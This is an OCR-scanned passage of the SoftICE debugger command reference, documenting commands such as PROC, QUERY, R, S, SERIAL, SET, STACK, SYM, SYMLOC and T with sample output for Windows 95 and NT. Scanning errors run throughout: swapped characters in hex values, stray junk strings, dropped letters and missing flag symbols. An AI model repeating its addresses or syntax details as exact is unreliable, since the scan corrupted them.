Mprexe 8155DFA4 FFFFFB1B 00000002 C1043340 00510000 00000000 
MSGSRV32 8155D018 FFFFF4A7 00000001 C1041E28 00400000 00000000 
KERNEL32 8165A31C FFFCF87A3 00000004 C10D9EDC 00640000 00000000 
Type: 00000005 RefCount: 00000002 Unknown1l: 00000000 

pEvent: 81569FC8 TermStatus: 00000103 Unknown2: 00000000 
DefaultHeap: 00410000 MemContext: C1033E38 

Flags: 00000000 

pPSP: 0001A1A0 PSPSelector: 26E7 MTEIndex: 0019 

Threads: 0001 ThrNotTerm: 0001 Unknown3: 00000000 

ROthreads: 0001 HeapHandle: 8155B000 K16TDB: 2816 

MMFViews: 00000000 pEDB: 81564448 pHandleTable: 8156A2C0 
ParentPDB: 8156630C MODREFlist: 8156ABBO Threadlist: 81569FE8 
DebuggeeCB: 00000000 LHFreeHead: 00000000 InitialROID: 00000000 
&crtLoadLock: 81569F64 pConsole: 00000000 Unknown4: C007757C 
ProcDWORDO: 00003734 ProcGroup: 8156630C ParentMODREF: 8156ABBO 
TopExFilter: 00000000 PriorityBase: 00000008 Heapownlist: 00650000 
HHandleBlks: 0051000C Unknown5: 00000000 pConProvider: 00000000 
wEnvSel: 19B7 wErrorMode: 0000 pEvtLdFinish 8156A2A0 

UTState: 0000 
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Environment Database 


This example shows a partial listing of the objects in Kernel32: 
.:PROC -o kernel32 

Environment: 00520020 Unknownl: 00000000 

CommandLine: 81564500 C:\PROJECTS\GDIDEMO\Gdidemo.exe 
CurrentDir: 81564524 C:\PROJECTS\GDIDEMO 

StartupInfo: 8156A53C hStdIn: FFFFFFFF hStdOut: FFFFFFFF 
hStdError: FFFFFFFF Unknown2: 00000001 InheritCon 00000000 
BreakType: 00000000 BreakSem: 00000000 BreakEvent: 00000000 
BreakThreadId: 00000000 BrkHandlers: 00000000 

Handle Object Type 

8165A32C Process 

8155BFFC Event 

C103E3A4 Memory Mapped file 

COFFEOEO Memory Mapped file 

COFFE22C Memory Mapped file 

C0FF1058 Memory Mapped file 

8155C01C Event 

8155CCE4 Event 

8155CD5C Event 

8155CD8C Thread 

8155D008 Event 

C1041C04 Memory Mapped file 

8155D870 Event 


DONPOOLNDQOUIDSWNK 


For Windows NT 
The following is an example using the PROC command without parameters: 
. : PROC 


Note: The process that was active when SoftICE popped up will be highlighted. 
The 
currently active process/address context within SoftICE will be indicated by an 
asterisk 
ia . 

Process KPEB PID Threads Pri User 

Time 

Krnl 

Time 

Status 

System FD8E0020 2 14 8 00000000 00001A48 Ready 
smss FD8B9020 13 6 B 00000022 00000022 Swapped 
csrss FD8B3DCO 1F 12 D 00B416C5 00049C4E Ready 
winlogon FD8AD020 19 2 D 00000028 00000072 Idle 
services FD8A6880 28 B 9 0000018E 0000055A Idle 
lsass FD8A4020 2A C 9 0000001B 00000058 Idle 
spoolss FD87ACA0O 43 6 8 000000AB 000000BD Idle 
nddeagnt FD872780 4A 1 8 00000004 0000000C Idle 
*ntvdm FD86DDCO 50 6 9 00125B98 0003COBE Running 
scm FD85B300 5D 3 8 00000024 0000008A Idle 
Explorer FD850020 60 3 D 000002DE 00000447 Ready 
Idle 8016A9E0 0 1 0 00000000 00135D03 Ready 


The following is an example of using the -eXtended option for a specific 
process, in this case 
Explorer: 
. PROC -x explorer 
Extended Process Information for Explorer(60) 
KPEB: FD850020 PID: 60 Parent: Unknown(48) 
Base Pri: D Mem Pri: © Quantum: 2 
Usage Cnt: 1 Win Ver: 4.00 Err. Mode: 0 
Status: Ready 
Processor: 00000000 Affinity: 1 
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Page Directory: 011CA000 LDT Base: 00000000 LDT Limit: 0000 
Kernel Time: 00000447 User Time: 000002DE 

Create Time: 01BB10646E2DBE90 

Exit Time: 0000000000000000 

Vad Root: FD842E28 MRU Vad: FD842E28 Empty Vad: FD823D08 
DebugPort: 00000000 ExceptPort: E118B040 SE token: E1240450 
SpinLock: 00000000 HUPEB: 00000004 UPEB: 7FFDF000 
ForkInProgress: FALSE Thread: 00000000(0) 

Process Lock: 00000001 Owner: 00000000(0) 

Copy Mem Lock: 00000000 Owner: 00000000(0) 

Locked Pages: 00000000 ProtoPTES: 000000DD Modified Pages: 000000E4 
Private Pages: 0000014F Virt Size: 013F8000 Peak Virt Size: 01894000 
---- Working Set Information ---- 

Update Time: 01BB11D0D7B299C0 

Data: C0502000 Table: C0502470 

Pages: 00000879 Faults: 00000899 Peak Size: 00000374 

Size: 000002AF Minimum: 00000032 Maximum: 00000159 

---- Non Pageable Pool Statistics ---- 

Quota Usage: 00000E78 Peak Usage: 00001238 

Inherited Usage: 0000C093 Peak Usage: 00056555 Limit: 00080000 
---- Pageable Pool Statistics ---- 

Quota Usage: 00003127 Peak Usage: 00004195 

Inherited Usage: 0000C000 Peak Usage: 00004768 Limit: 000009CA 
---- Pagefile Statistics ---- 

Quota Usage: 00000151 Peak Usage: 0000016E 

Inherited Usage: FFFFFFFF Peak Usage: 00000151 Limit: 00000000 
---- Handle Table Information ---- 

Handle Table: E10CE5E8 Handle Array: E1265D48 Entries: 50 


: QUERY 
AQUERY Windows 95, Windows NT SystemInformation 
ADisplay the virtual address map of a process. 


%Syntax 
QUERY [[-x] address] | [process-type] 


-xX Shows the mapping for a specific linear address within every context 
where it is valid. 

address Linear address to query. 

process-type Expression that can be interpreted as a process. 


%Use 

The QUERY command displays a map of a single process's virtual address space or 
the 

mapping for a specific linear address. If no parameter is specified, QUERY 
displays the map of 

the current process. If a process parameter is specified, QUERY displays 
information about 

each address range in the process. 


%Output 

For Windows 95 

Under Windows 95, the QUERY command displays the following information: 
Base Pointer to the base address of the region of pages. 

AllocBase Pointer to the base address of a range of pages allocated by the 
VirtualAlloc function that contains the base address in the Base 

column. 

AllocProtect Access protection assigned when the region was initially 
allocated. 

Size Size, in bytes, of the region starting at the base address in which all 
pages have the same attributes. 

State State of the pages in the region : Commit, Free, or Reserve. 

Commit --- Committed pages for which physical storage was 
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allocated 

Free --- Free pages not accessible to the calling process and 
available to be allocated. AllocBase, AllocProtect, Protect, and 
Owner are undefined. 

Reserve --- Reserved pages. A range of the process's virtual address 
space is reserved, but physical storage is not allocated. Current 
Access Protection (Protect) is undefined. 

Protect Current Access protection. 
Owner Owner of the region. 
Context Address context. 


For Windows NT 

The QUERY command displays the following information: 

Context Address context. 

Address Range Start and end address of the linear range. 

Flags Flags from the node structure. 

MMCI Pointer to the memory management structure. 

PTE Structure that contains the ProtoPTEs for the address range. 

Name Additional information about the range. This includes the following: 
Memory mapped files will show the name of the mapped file. 
Executable modules will show the file name of the DLL or EXE. 
Stacks will be displayed as STACK(thread ID). 
Thread information blocks will be displayed as TIB(thread ID). 

. Any address that the WHAT command can identify may also 

appear. 


%Example 
Windows 95 
The following example uses the QUERY command with no parameters to display a 
partial 
listing of the map for the current process, GDIDEMO: 
QUERY 


The following example shows every context where base address 416000 is valid: 
QUERY -x 416000 


Base AllocBase AllocProt Size State Protect Owner 
0 0 0 400000 Free NA 

400000 400000 1 7000 Commit RO GDIDEMO 

407000 400000 1 2000 Commit RW GDIDEMO 

409000 400000 1 2000 Commit RO GDIDEMO 

40B000 400000 1 5000 Reserve NA GDIDEMO 

410000 410000 1 1000 Commit RW Heap 32 

411000 410000 1 FF000 Reserve NA Heap 32 

510000 410000 1 1000 Commit RW Heap 32 

511000 410000 1 FO00 Reserve NA Heap 32 

520000 520000 4 1000 Commit RW 

521000 520000 4 F000 Reserve NA 

Base AllocBase AllocProt Size State Protect Owner Context 
416000 400000 1 F1000 Reserve NA KERNEL32 

416000 400000 1 E9000 Reserve NA Heap 32 MSGSRV32 
416000 400000 1 DO00 Commit RO EXPLORER Explorer 
416000 410000 1 F9000 Reserve NA Heap 32 WINFILE 
416000 400000 1 2000 Commit RO CONSOLE Console 
416000 400000 1 E9000 Reserve NA Heap 32 WINOLDAP 
416000 410000 0 EA000 Free NA Mprexe 

416000 410000 1 FA000 Reserve NA Heap 32 Spoo132 


The following example shows a partial listing of the virtual address map for 
Explorer: 

: QUERY EXPLORER 
Windows NT 


Pagina 745 di 991 


The following example uses the QUERY command to map a specific linear address 
for 

Windows NT: 

. QUERY 7f2d0123 


Base AllocBase AllocProt Size State Protect Owner 
0 0 0 400000 Free NA 

400000 400000 1 23000 Commit RO EXPLORER 

423000 400000 1 1000 Commit RW EXPLORER 

424000 400000 1 11000 Commit RO EXPLORER 

435000 400000 1 B000 Reserve NA EXPLORER 

440000 440000 1 9000 Commit RW Heap32 

449000 440000 1 F7000 Reserve NA Heap32 

540000 440000 1 1000 Commit RW Heap32 

541000 440000 1 FO00 Reserve NA Heap32 

550000 550000 4 1000 Commit RW 

551000 550000 4 F000 Reserve NA 

560000 560000 1 106000 Reserve NA 

Context Address Range Flags MMCI PTE Name 

csrss 7F2D0000-7F5CFFFF 06000000 FD8AC128 E1191068 Heap #07 


The following example uses the QUERY command to list the address map of the 
PROGMAN process for Windows NT: 

.:QUERY progman 

.:query progman 

Address Range Flags MMCI PTE Name 

00010000-00010FFF C4000001 

00020000-00020FFF C4000001 

00030000-0012FFFF 84000004 STACK(6E) 

00130000-00130FFF C4000001 

00140000-0023FFFF 8400002D Heap #01 

00240000-0024FFFF 04000000 FF0960C8 E1249948 Heap #02 
00250000-00258FFF 01800000 FF0E8088 E11B9068 unicode.nls 
00260000-0026DFFF 01800000 FF0E7F68 E11BBD88 locale.nls 
00270000-002BOFFF 01800000 FF0E7C68 E11B6688 sortkey.nls 
002C0000-002COFFF 01800000 FFOE7AE8 E11BBA08 sorttbls.nls 
002D0000-002DFFFF 04000000 FF09F3C8 E1249E88 
002E0000-0035FFFF 84000001 

00360000-00360FFF C4000001 

00370000-0046FFFF 84000003 STACK(2E) 

00470000-0047FFFF 04000000 FFODF4E8 E124AAA8 
00480000-00481FFF 01800000 FF0E7DE8 E110C6E8 ctype.nls 
01A00000-01A30FFF 07300005 FF097AC8 E1246448 progman.exe 
771DE0000-77DEFFFF 07300003 FFOFC008 E1108928 shell32.dl1 
771E20000-77E4BFFF 07300007 FFOFBA08 E1110A08 advapi32.dl1 
771E50000-77E54FFF 07300002 FFOFADC8 E1103EE8 rpcltc1.dll 
77E60000-77E9BFFF 07300003 FF0FB728 E1110C48 rpcrt4.dll 
77EA0000-77ED7FFF 07300003 FFOFCE08 E11048C8 user32.dll 
771EE0000-77F12FFF 07300002 FF0FD868 E110F608 gdi32.dll 
771F20000-77F73FFF 07300003 FFOEE1A8 E110C768 kernel32.dl1 
771F80000-77FCDFFF 07300005 FF0FDB48 E1101068 ntdll.dll 
7F2D0000-7F5CFFFF 03400000 FF0E2C08 E11C3068 Heap #05 
7F5F0000-7F7EFFFF 03400000 FFOESEA8 E11B77E8 
7FF70000-7FFAFFFF 84000001 

7FFB0000-7FFD3FFF 01600000 FF116288 E1000188 Ansi Code Page 
7FFDD000-7FFDDFFF C4000001 TIB(2E) 

7FFDE000-7FFDEFFF C4000001 TIB(6E) 

7FFDF000-7FFDFFFF C4000001 SubSystem Process 


:R 
AR Windows 3.1, Windows 95, Windows NT Display/ChangeMemory 
ADisplay or change the register values. 
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%Syntax 
For Windows 3.1 
R [register-name [[=]value]] 


For Windows 95 and Windows NT 
R [-d | register-name | register-name [=] value] 


register-name Any of the following: AL, AH, AX, EAX, BL, BH, BX, EBX, CL, 
CH, CX, ECX, DL, DH, DX, EDX, DI, EDI, SI, ESI, BP, EBP, SP, 

ESP, IP, EIP, FL, DS, ES, SS, CS FS, GS. 

value If register-name is any name other than FL, the value is a hexadecimal 
value or an expression. If register-name is FL, the value is a series of 
one or more of the following flag symbols, each optionally preceded 

by a plus or minus sign: 

5 (Overflow flag) 

(Direction flag) 

(Interrupt flag) 

(Sign flag) 

(Zero flag) 

(Auxiliary carry flag) 

(Parity flag) 

5 (Carry flag) 

-d Displays the registers in the Command window. 


OTEBNWVHOO 


%Use 

If no parameters are supplied, the cursor moves up to the Register window, and 
the registers 

can be edited in place. If the Register window is not currently visible, it is 
made visible. If 

register-name is supplied without a value, the cursor moves up to the Register 
window 

positioned at the beginning of the appropriate register field. 


If both register-name and value are supplied, the specified register's contents 
are changed to 
the value. 


To change a flag value, use FL as the register-name, followed by the symbols of 
the flag whose 

values you want to toggle. To turn a flag on, precede the flag symbol with a 
plus sign. To turn 

a flag off, precede the flag symbol with a minus sign. If neither a plus or 
negative sign is 

specified, the flag value will toggle from its current state. The flags can be 
listed in any order. 


%Example 
This example sets the AH register equal to 5. 
R ah=5 


This example toggles the 0, Z, and P flag values. 
R fl=ozp 


This example moves the cursor into the Register window position under the first 
flag field. 
R fl 


This example toggles the O flag value, turns on the A flag value, and turns off 


the C flag value. 
R fl=o+a-c 
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: RS 

ARS WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
AF4 

ARestore the program screen. 


%Syntax 
RS 


%Use 
The RS command allows you to restore the program screen temporarily. 


This feature is useful when debugging programs that update the screen 
frequently. Use the RS 

command to redisplay your program screen. To return to the SoftICE screen, 
press any key. 


:S 
AS Windows 3.1, Windows 95, Windows NT Miscellaneous 
ASearch memory for data. 


%Syntax 
For Windows 3.1 
S [address L length data-list] 


For Windows 95 and Windows NT 
S [-cu][address L length data-list] 


address Starting address for search. 

length Length in bytes. 

data-list List of bytes or quoted strings separated by commas or spaces. A 
quoted string can be enclosed with single or double quotes. 

-c Make search case-insensitive. 

-u Search for Unicode string. 


%Use 

Memory is searched for a series of bytes or characters that matches the data- 
list. The search 

begins at the specified address and continues for the length specified. when a 
match is found, 

the memory at that address is displayed in the Data window. and the following 
message is 

displayed in the Command window. 

PATTERN FOUND AT location 


If the Data window is not visible, it is made visible. 

To search for subsequent occurrences of the data-list, use the S command with 
no parameters. 

The search will continue from the address where the data-list was last found, 
until it finds 

another occurrence of data-list or the length is exhausted. 


The S command ignores pages that are marked not present. This makes it possible 
to search 

large areas of address space using the flat data selector (Windows 3.1/Windows 
95: 30h, 

Windows NT: 10h). 


%Example 

This example searches for the string 'Hello' followed by the bytes 12h and 34h 
starting at 

offset ES:DI+10 for a length of ECX bytes. 

S es:di+10 L ecx 'Hello',12,34 
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This example searches the entire 4GB virtual address range for 'string'. 
S 30:0 L ffffffff 'string' 


: SERIAL 
ASERIAL Windows 3.1, Windows 95, Windows NT Customization 
ARedirect console to serial terminal. 


%Syntax 
SERIAL [on [com-port] [baud-rate] | off] 


com-port Number from 1 to 4 that corresponds to COM1, COM2, COM3 or 

COM4. befault is COM1. 

baud-rate Baud-rate to use for serial communications. The default is to have 
SoftICE automatically determine the fastest possible baud-rate that 

can be used. The rates are 1200, 2400, 4800, 9600, 19200, 23040, 

28800, 38400, 57000, 115000. 


%Use 

Use the SERIAL command to establish a remote debugging session through a serial 
port (refer 

to DIAL on page 67 for establishing remote sessions over a modem). Remote 
debugging 

requires a second IBM-compatible PC running MSDOS. The machine being debugged 
is 

known as the local machine, and the machine where SoftICE is being controlled 
remotely is 

known as the remote machine. 


To use the SERIAL command, the remote and local machines must be connected with 
a null 

modem cable, with wiring as shown in the following figure, attached through 
serial ports. 

Before using the SERIAL command on the local machine, you must first run the 
SERIAL.EXE program on the remote machine. 


The syntax for the SERIAL.EXE program is the same as the syntax of the SERIAL 
command, 
so the following information is applicable to both. 


The SERIAL command has two optional parameters. The first parameter specifies 
the com- 

port through which the connection will be made (on the machine where the 
command is 

entered). If no com-port is specified, com-port 1 (COM1) is chosen by default. 
The second 

parameter specifies a baud-rate. If a baud-rate is specified, the same baud- 
rate must be 

explicitly specified on both sides of the connection. If no baud-rate is 
specified, SoftICE will 

attempt to determine the fastest baud-rate that can be used over the connection 
without data 

loss. The process of arriving at the maximum rate can take a few seconds, 
during which 

SoftICE prints the rates it is checking. After the maximum rate is determined, 
SoftICE 

indicates the result. 


when a connection is established between a remote machine and a local machine, 
the user of 

the remote machine is presented with the same SoftICE interface they would see 
if they were 
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debugging on the local machine. The display on the local machine is restored to 
the Windows 
screen while the connection is maintained. 


Ctrl D is always the pop-up hot key sequence on the remote machine. SoftICE can 
also be 

popped up from the local machine with the local machine's pop-up hot key 
sequence (which 

may have been set via the ALTKEY command). 


If the remote machine has a monochrome display, the COLOR command can be used 
to 
make SoftICE's output more readable. 


If for any reason data is lost over the connection and SoftICE output on the 
remote machine 

becomes corrupted, Shift \ (backslash) can be typed on the remote machine to 
force a repaint 

of the SoftICE screen. 


Specifying SERIAL OFF will end the remote debugging session and SoftICE will 
resume 

using the local machine for 1/0. SERIAL with no parameters will display the 
current serial 

state and the com-port and baud-rate being used if SERIAL is ON. 

Using Ctrl-Z will exit the SERIAL.EXE program on the remote machine after a 
remote 

debugging session is complete. 


If you place the SERIAL command in the SoftICE initialization string setting, 
SERIAL.EXE 

must be running on the remote machine before SoftICE is started on the local 
machine. 

Pins 
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For Windows 3.1 

Prior to using the SERIAL command, you must place the COMn keyword on a 
separate line 

in the WINICE.DAT file to reserve a specific COM port for the serial 
connection. The n is a 

number between 1 and 4 representing the COM port. If this statement is not 
present in 

WINICE.DAT, SoftICE cannot be popped up from the remote machine. To set Com 2 
as the 

serial post, use: 

Com2 


For Windows 95 

Select the desired com port in the remote debugging initialization settings 
within Symbol 

Loader. 


%Example 
On the remote machine: 
SERIAL.EXE on 19200 
On the local machine: 
SERIAL on 2 19200 


when the first command is executed, the remote machine will be prepared to 
receive a 

connection request from the local machine on its first com-port at 19200bps. 
The second 

command establishes a connection between the two machines through the local 
machine's 

second com-port. Since the first command explicitly specified a baud rate, the 
SERIAL 

command on the local machine must explicitly specify the same baud rate of 
19200bps. 

Once the connection is established, the remote machine will serve as the 
SoftICE interface for 

debugging the local machine until SERIAL off is entered on the remote machine. 
See Also Chapter 7, Debugging Remotely,'' in the Using SoftICE manual. 


: SET 
ASET Windows 95 and Windows NT ModeControl 
ADisplay or change the state of an internal variable. 


%Syntax 
SET [keyword] [on | off] [value] 


%Use 

Use the SET command to display or change the state of internal SoftICE 
variables. 

If you specify SET with a keyword, ON or OFF enables or disables that option. 
If you specify 

SET with a keyword and value, it assigns the value to the keyword. If SET is 
followed by a 

keyword with no additional parameters, it displays the state of the keyword. 
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Using SET without parameters displays the state of all keywords. 


SET supports the following keywords: 

SET CASESENSITIVE ON makes global and local symbol names case sensitive. Enter 
them 

exactly as displayed by the SYM command. 
ALTSCR [on]off ] 

CASESENSITIVE [on|off ] 

CODE [on|joff ] 

EXCLUDE [on|off ] 

FAULTS [on|off ] 

FLASH [on]|off ] 

I1HERE [on]|off ] 

ISHERE [on]|off ] 

LOWERCASE [on]|off ] 

MOUSE [on|off ] [1|2]|3] 

PAUSE [on|off ] 

SYMBOLS [on|off ] 

TABS [on|off ] [1|2|3]4]|5|6|7]8] 

THREADP [on]|off ] 

VERBOSE [on|off ] 


SET MOUSE ON enables mouse support and SET MOUSE OFF disables it. To adjust the 
speed at which the mouse moves, use one of the following: 1 (slowest speed); 2 
(intermediate 

speed--this is the mouse default.); 3 (fastest speed). 

SET SYMBOLS ON instructs the disassembler to show the symbol names in 
disassembled 

code. SET SYMBOLS OFF instructs the disassembler to show numbers (for example, 
offsets 

and addresses). This command applies to both local and global symbol names. 


%Example 
The following example enables SoftICE fault trapping: 
SET faults on 


The following example sets the mouse to the fastest speed: 
SET mouse 3 


: SHOW 

ASHOW WINDOWS 3.1, WINDOWS 95 SYMBOL/SOURCE 

ACtrl-F11 

ADisplay instructions from the back trace history buffer. 


%Syntax 
SHOW [B | start] [1 length] 


start Hexadecimal number specifying the index within the back trace 
history buffer to start disassembling from. An index of 1 corresponds 
to the newest instruction in the buffer. 

length Number of instructions to display. 


%Use 

Use the SHOW command to display instructions from the back trace history 
buffer. If source 

is available for the instructions, the display is in mixed mode; otherwise, 
only code is 

displayed. 


All instructions and source are displayed in the Command window. Each 
instruction is 
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preceded by its index within the back trace history buffer. The instruction 
whose index is 1 is 

the newest instruction in the buffer. Once SHOW is entered, you can use the Up 
and Down 

Arrow keys to scroll through the contents of the back trace history buffer. To 
exit from 

SHOW, press the Esc key. 


SHOW with no parameters or SHOW B will begin displaying from the back trace 
history 

buffer starting with the oldest instruction in the buffer. SHOW followed by a 
start number 

begins displaying instructions starting at the specified index within the back 
trace history 

buffer. 


You can use the SHOW command only if the back trace history buffer contains 
instructions. 

To fill the back trace history buffer, use the BPR command with either the T or 
TW 

parameter to specifying a range breakpoint. 


%Example 

This command starts displaying instructions in the Command window, starting at 
the oldest 

instruction in the back trace history buffer. 


SHOW B 
: SRC 

ASRC WINDOWS 3.1, WINDOWS 95, WINDOWS NT SYMBOL/SOURCE 
AF3 


AToggle between displaying source, mixed, and code in the Code window. 


%Syntax 
SRC 


%Use 

Use the SRC command to toggle among the following modes in the Code window: 
ource 

mode, mixed mode, and code mode. 


Hint: Use F3 to toggle modes quickly. 


%Example 
The following example changes the current mode of the Code window: 
SRC 


SS 
ASS Windows 3.1, Windows 95, Windows NT Symbol/Source 
A Search the current source file for a string. 


%Syntax 
SS [line-number] ['string'] 
line-number Decimal number. 
string Character string surrounded by quotes. 


%Use 

The SS command searches the current source file for the specified character 
tring. If there isa 

match, the line that contains the string is displayed as the top line in the 
ode window. 


Pagina 753 di 991 


The search starts at the specified line-number. If no line-number is pecified, 
the search starts 
at the top line displayed in the Code window. 


If no parameters are specified, the search continues for the previously 
pecified string. 

The Code window must be visible and in source mode before using the SS ommand. 
To 

make the Code window visible, use the WC command. To make the Code window 
isplay 

source, use the SRC command. 


%Example 

In the following example, the current source file is searched starting at ine 1 
for the string 'if 

(i==3)'. The line containing the next occurrence of the string becomes the op 
line displayed 

in the Code window. 

SS 1 ‘if (i==3)' 


: STACK 
ASTACK Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay a call stack. 


%Syntax 
For Windows 3.1 and Windows 95 
STACK [task-name | SS:[E]BP] 


task-name Name of the task as displayed by the TASK command. 
SS: [E]BP SS:[E]BP of a valid stack frame. 


For Windows NT 
STACK [thread-type | stack frame] 


thread-type Thread handle or thread ID. 
stack frame Value that is not a thread-type is interpreted as a stack frame. 


%Use 

Use the STACK command to display the call stacks for DOS programs, Windows 
asks, and 

32-bit code. 


If you enter STACK with no parameters, the current SS:[E]BP is used as a base 
or the stack 

frame displayed. You can explicitly specify a stack base with a task-name or 
base address, and 

under Windows NT, with a thread identifier. 


If you are using STACK to display the stack of a Windows task that is not the 
current one, 

specify either its task-name or a valid SS:[E]BP stack frame. You can use the 
TASK command 

to obtain a list of running tasks. However, you should avoid using the STACK 
command 

with the current task of the TASK command's output (marked with an '*'), 
because the task's 

last known SS:[E]BP is no longer valid. 


The STACK command walks the stack starting at the base by traversing x86 stack 
frames. If 

an invalid stack frame or address that has been paged out is encountered during 
the walk, the 
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traversal will stop. The address of the call instruction at each frame is 
displayed along with the 

name of the routine it is in, if the routine is found in the current symbol 
table. If the routine 

is not in the symbol table, the export list and module name list are searched 
for nearby 

symbols. If stack variables are present, they are displayed as well. 


The STACK command works in 32-bit code, however, since 32-bit symbol 
information 

support is limited to that provided in .SYM files, local variables cannot be 
shown. For each 

frame in the call stack, both the nearest symbol to the call instruction, and 
the actual address, 

are displayed. If there is no symbol available, the module name and 
object/section name are 

displayed instead. 


The 32-bit call stack support is not limited to applications; it will also work 
for VxDs and 

Windows NT device driver code at ring 0. Since many VxDs are written in 
assembly 

language, there may not be a valid call stack to walk from a VxD-stack base 
address. 

For Windows 3.1 and Windows 95, the call stack is not followed through thunks 
or ring 

transitions, but under Windows NT it is. 


For Windows 3.1 and Windows 95 

If you want SoftICE to pop up when a non-active task is restarted, you can set 
the STACK 

command with the task as a parameter to find the address on which to set an 
execution 

breakpoint. To do this, enter STACK followed by the task-name. The bottom line 
of the call 

stack will show an address preceded by the word 'at'. This is the address of 
the CALL 

instruction the program made to Windows that has not yet returned. You must set 
an 

execution breakpoint at the address following this call. 


You can also use this technique to stop at other routines higher on the call 
stack. This is useful 

when you do not want to single step through library code until execution 
resumes in your 

program's code. 


%Output 
Each entry of the call stack contains the following information: 
Symbol name or module name in which the return address falls 
SS:[E]BP value of this entry 
Call instruction's source line number if available 
. Address of the first line of this routine or the name of the routine that was 
called to reach 
this routine 
If stack variables are available for this entry, the following information 
about each is displayed: 
SS:[E]BP relative offset 
Stack variable name 
Data in the stack variable if it is of type char, int, or long 


%Example 
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This is the output of the STACK command after a breakpoint is set in the 
message handler of 

a Windows program. 

. STACK 

_ astart at 0935:1021 [?] 

WinMain at 0935:0d76 [00750] 
[BP+000C]hInstance 0935 
[BP+000A]hPrev 0000 
[BP+0006]1pszCmdLine 
[BP+0004]CmdShow 

[BP-0002]width 00DD 

[BP-0004]hwnd 00E5 
USER!SENDMESSAGE+004F at 05CD:06A7 
USER(01) at 0595:04A0 [?] 0595:048b 
USER(06) at 05BD:1A83 [?] 
=>ClockWndProc at 0935:006F [0179] 
[BP+000E]hwnd 1954 
[BP+000C]message 0024 
[BP+000A]wParam 0000 
[BP+0006]lParam 06ED:07A4 
[BP-0022]ps 0000 


This is an example of the STACK command in 32-bit mode. Execution has been 
stopped 

within the C library DLL's memset routine: 

. STACK 

W32SCOMB!DispatchCB32+01FF at 2197:86C5003B 

UTSAMP! .text+01A4 at 2197:86C211A4 

_MyGetFreeSpace@0+0016 at 2197:86C7113B 

=> MSVCRT10!memset+0005 at 2197:86C94F89 


: SYM 
ASYM Windows 3.1, Windows 95, Windows NT Symbol/Source 
ADisplay or set symbol. 


%Syntax 
SYM [[section-name] ! ] symbol-name [value]] 


section-name Valid section-name. Also can be a partial section-name. This 
lalows 

displaying symbols in a particular section. If section-name is specified, 

it must be followed by an exclamation point (!). For example, you 

could use the command 

SYM .TEXT! to display all symbols in the .TEXT section of the 

executable. 

! If © !'' is the only parameter specified, the modules in this symbol table 
are listed. 

symbol-name Valid symbol-name. The symbol-name can end with an asterisk (*). 
This allows searching if only the first part of the symbol-name is 

known. The comma ©©,'' character can be used as a wildcard character 

in place of any character in the symbol-name. 

value Value that is used to set a symbol to a specific address. 


%Use 

Use the SYM command to display and set symbol addresses. If you enter SYM 
without 

parameters, all symbols display. The address of each symbol displays next to 
the symbol-name. 

If you specify a symbol-name without a value, the symbol-name and its address 
display. If the 

symbol-name is not found, nothing displays. 
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If section-name! precedes symbol-name or asterisk (*), only symbols from the 
specified section 
are shown. 


The SYM command is often useful for finding a symbol when you can only remember 
a 

portion of the name. Two wildcard methods are available for locating symbols. 
If symbol- 

name ends with an asterisk (*), all symbols that match the actual characters 
typed prior to the 

asterisk display, regardless of their ending characters. If you use a comma (,) 
in place of a 

specific character in symbol-name, that character is a wild card character. 

If you specify a value, the address of all symbols that match symbol-name are 
set to the value. 

If you place an address between square brackets as a parameter to the SYM 
command, the 

closest symbol above and below the address display. 


%Example 

All symbols that start with FOO display. 

SYM foo* 

All symbols that start with FOO are given the address 6000. 
SYM foo* 6000 

All sections for the current symbol table display. 

SYM ! 

All symbols in section MAIN that start with F00 display. 
SYM main!foo* 


: SYMLOC 
ASYMLOC Windows 3.1, Windows 95, Windows NT Symbol/Source 
ARelocate the symbol base. 


%Syntax 
For Windows 3.1 
SYMLOC [segment-address | o | r | 
(section-number selector linear-address)] 


For Windows 95 and Windows NT 

SYMLOC [segment-address | o | r | -c process-type | 

(section-number selector linear-address)] 

segment address Only use to relocate DOS programs. 

o For 16-bit Windows table only. Changes all selector values back to 
their ordinal state. 

r For 16-bit Windows table only. Changes all segment ordinals to their 
appropriate selector value. 

-c Specify a context value for a symbol table. Use when debugging DOS 
extended applications. 

section-number For 32-bit tables only. PE file 1 based section-number. 
selector For 32-bit tables only. Protected mode selector. 
linear-address For 32-bit tables only. Base address of the section. 


%Use 

The SYMLOC command handles symbol fixups in a loaded symbol table. The command 

contains support for DOS tables, 16-bit protected mode Windows tables (using 0 
and R 

commands only), and 32-bit protected mode tables. The 32-bit support is 
intended for 32-bit 

code that must be manually fixed up such as DOS 32-bit extender applications. 


In a DOS program, SYMLOC relocates the segment components of all symbols 
relative to the 
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specified segment-address. This function is necessary when debugging loadable 
device drivers 
or other programs that cannot be loaded directly with the SoftICE Loader. 


When relocating for a loadable device driver, use the value of the base address 
of the driver as 

found in the MAP command. when relocating for an .EXE program, the value is 10h 
greater 

than that found as the base in the MAP command. When relocating for a .COM 
program, 

use the base segment address that is found in the MAP command. 


The MAP command displays at least two entries for each program. The first is 
typically the 

environment and the second is typically the program. The base address of the 
program is the 

relocation value. 


For Windows 95 and Windows NT 

The SYMLOC -C option allows you to associate a specific address context with 
the current 

symbol table. This option is useful for debugging an extender application under 
Windows 

NT where SoftICE would not be able to assign a context to the symbol table 
automatically. 


%Example 

The following example relocates all segments in the symbol table relative to 
1244. The +10 

relocates a TSR that was originally an .EXE file. If it is a .COM file or a DOS 
loadable device 

driver, the +10 is not necessary. 

. :SYMLOC 1244+10 

The following example relocates all symbols in section 1 of the table to 
401000h using 

selector 1Bh. Each section of the 32-bit table must be relocated separately. 

.:SYMLOC 1 1b 401000 

The following example sets the context of the current symbol table to the 
process whose 

process ID is 47. Subsequently, when symbols are used, SoftICE will 
automatically switch to 

that process. 

.:SYMLOC -c 47 


iT 

AT WINDOWS 3.1, WINDOWS 95, WINDOWS NT FLOWCONTROL 
NF8 

ATrace one instruction. 


%Syntax 
T [=start-address] [count] 


count Specify how many times SoftICE should single step before stopping. 


%Use 

The T command uses the single step flag to single step one instruction. 

Execution begins at the current CS:EIP, unless you specify the start-address 
parameter. If you 

specify this parameter, CS:EIP is changed to start-address prior to single 
stepping. 


If you specify count, SoftICE single steps count times. Use the Esc key to 
terminate stepping 
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with a count. 


If the Register window is visible when SoftICE pops up, all registers that were 
altered since the 
T command was issued are displayed with the bold video attribute. 


If the Code window is in source mode, this command single steps to the next 
source 
statement. 


%Example 

This example single steps through eight instructions starting at memory 
location CS:1112. 

T = CS:1112 8 


: TABLE 
